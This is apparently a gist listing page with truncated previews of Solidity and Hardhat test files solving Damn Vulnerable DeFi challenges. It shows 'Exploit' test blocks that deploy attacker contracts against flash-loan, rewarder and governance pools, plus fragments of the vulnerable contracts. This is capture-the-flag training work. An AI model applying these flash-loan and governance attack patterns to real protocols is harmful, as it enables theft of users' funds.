This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity 0.8.17; | |
import "@openzeppelin/contracts/token/ERC721/ERC721.sol"; | |
import "@openzeppelin/contracts/utils/Counters.sol"; | |
contract Mock721 is ERC721 { | |
using Counters for Counters.Counter; | |
Counters.Counter private _tokenIdCounter; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
const RewardExploit = await ethers.getContractFactory('RewardExploit', attacker); | |
const exploit = await RewardExploit.deploy(attacker.address, this.flashLoanPool.address, this.liquidityToken.address, this.rewarderPool.address, this.rewardToken.address); | |
await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days | |
await exploit.exploit(TOKENS_IN_LENDER_POOL); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
interface IFlashLoanerPool { | |
function flashLoan(uint256 amount) external; | |
} | |
interface IDamnValuableToken { | |
function transfer(address recipient, uint256 amount) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
contract TheRewarderPool { | |
// Minimum duration of each round of rewards in seconds | |
uint256 private constant REWARDS_ROUND_MIN_DURATION = 5 days; | |
... | |
function deposit(uint256 amountToDeposit) external { | |
require(amountToDeposit > 0, "Must deposit tokens"); | |
accToken.mint(msg.sender, amountToDeposit); | |
distributeRewards(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
const SelfieExploitFactory = await ethers.getContractFactory('SelfieExploit', attacker); | |
const exploitContract = await SelfieExploitFactory.deploy(this.pool.address, attacker.address, this.governance.address); | |
await exploitContract.attack(TOKENS_IN_POOL); | |
await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]); | |
await exploitContract.execute(); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
interface ISelfiePool { | |
function flashLoan(uint256 borrowAmount) external; | |
} | |
interface ISimpleGovernance { | |
function executeAction(uint256 actionId) external payable; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
... | |
contract SimpleGovernance { | |
... | |
struct GovernanceAction { | |
address receiver; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "./SimpleGovernance.sol"; | |
/** | |
* @title SelfiePool |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
const AttackerContract = await ethers.getContractFactory("AttackerContract", attacker); | |
this.exploit = await AttackerContract.deploy(await this.pool.address); | |
this.exploit.connect(attacker).exploit(ETHER_IN_POOL); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
contract AttackerContract { | |
SideEntranceLenderPool pool; | |
address payable attacker; | |
constructor(address _pool) { | |
pool = SideEntranceLenderPool(_pool); | |
attacker = payable(msg.sender); | |
} | |
function exploit(uint256 amount) public { |
NewerOlder